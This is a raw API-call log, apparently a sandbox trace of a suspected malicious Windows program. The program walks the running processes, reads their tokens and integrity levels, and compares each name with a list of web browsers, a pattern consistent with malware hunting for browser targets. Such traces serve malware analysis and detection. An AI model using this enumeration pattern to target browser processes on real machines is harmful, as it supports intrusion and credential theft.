[0488.533] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0488.533] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0488.533] CloseHandle (hObject=0x3bc) returned 1 [0488.533] CloseHandle (hObject=0x5a4) returned 1 [0488.533] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0488.533] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0488.533] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0488.533] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0488.533] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0488.533] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0488.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0488.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0488.534] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0488.534] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0488.534] GetLastError () returned 0x7a [0488.534] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0488.534] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0488.534] CloseHandle (hObject=0x3bc) returned 1 [0488.534] CloseHandle (hObject=0x5a4) returned 1 [0488.535] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0488.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0488.535] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8c") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0488.535] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0488.535] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0488.535] GetLastError () returned 0x7a [0488.535] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0488.535] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0488.535] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0488.536] CloseHandle (hObject=0x3bc) returned 1 [0488.536] CloseHandle (hObject=0x5a4) returned 1 [0488.536] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0488.536] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0488.536] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0488.536] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0488.536] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0488.536] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0488.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0488.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0488.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0488.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0488.537] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0488.537] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0488.537] GetLastError () returned 0x7a [0488.537] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0488.537] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0488.537] CloseHandle (hObject=0x3bc) returned 1 [0488.537] CloseHandle (hObject=0x5a4) returned 1 [0488.538] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0488.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0488.538] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8d") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0488.538] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0488.538] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0488.538] GetLastError () returned 0x7a [0488.538] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0488.538] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0488.538] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0488.539] CloseHandle (hObject=0x3bc) returned 1 [0488.539] CloseHandle (hObject=0x5a4) returned 1 [0488.539] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0488.539] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0488.539] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0488.539] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0488.539] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0488.539] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0488.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0488.539] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0488.540] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0490.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0490.551] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0490.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0490.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0490.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0490.554] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0490.554] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0490.554] GetLastError () returned 0x7a [0490.554] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0490.554] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0490.554] CloseHandle (hObject=0x3bc) returned 1 [0490.555] CloseHandle (hObject=0x5a4) returned 1 [0490.555] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0490.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0490.555] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377de8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8e") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0490.555] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0490.555] GetLastError () returned 0x7a [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0490.555] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0490.555] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0490.555] CloseHandle (hObject=0x3bc) returned 1 [0490.555] CloseHandle (hObject=0x5a4) returned 1 [0490.555] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0490.555] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0490.555] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0490.555] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0490.555] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0490.555] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0490.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0490.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0490.555] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0490.555] GetLastError () returned 0x7a [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0490.555] CloseHandle (hObject=0x3bc) returned 1 [0490.555] CloseHandle (hObject=0x5a4) returned 1 [0490.555] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0490.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0490.555] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8f") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0490.555] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0490.555] GetLastError () returned 0x7a [0490.555] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0490.555] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0490.556] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0490.556] CloseHandle (hObject=0x3bc) returned 1 [0490.556] CloseHandle (hObject=0x5a4) returned 1 [0490.556] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0490.556] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0490.556] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0490.556] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0490.556] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0490.556] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0490.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0490.556] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0490.556] GetLastError () returned 0x7a [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0490.556] CloseHandle (hObject=0x3bc) returned 1 [0490.556] CloseHandle (hObject=0x5a4) returned 1 [0490.556] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0490.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0490.556] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x90") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0490.556] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0490.556] GetLastError () returned 0x7a [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0490.556] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0490.556] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0490.556] CloseHandle (hObject=0x3bc) returned 1 [0490.556] CloseHandle (hObject=0x5a4) returned 1 [0490.556] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0490.556] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0490.556] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0490.556] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0490.556] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0490.556] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0490.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0490.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0490.556] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0490.556] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0490.556] GetLastError () returned 0x7a [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0490.557] CloseHandle (hObject=0x3bc) returned 1 [0490.557] CloseHandle (hObject=0x5a4) returned 1 [0490.557] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0490.557] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x91") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0490.557] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0490.557] GetLastError () returned 0x7a [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0490.557] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0490.557] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0490.557] CloseHandle (hObject=0x3bc) returned 1 [0490.557] CloseHandle (hObject=0x5a4) returned 1 [0490.557] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0490.557] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0490.557] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0490.557] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0490.557] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0490.557] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0490.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0490.557] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0490.557] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0490.557] GetLastError () returned 0x7a 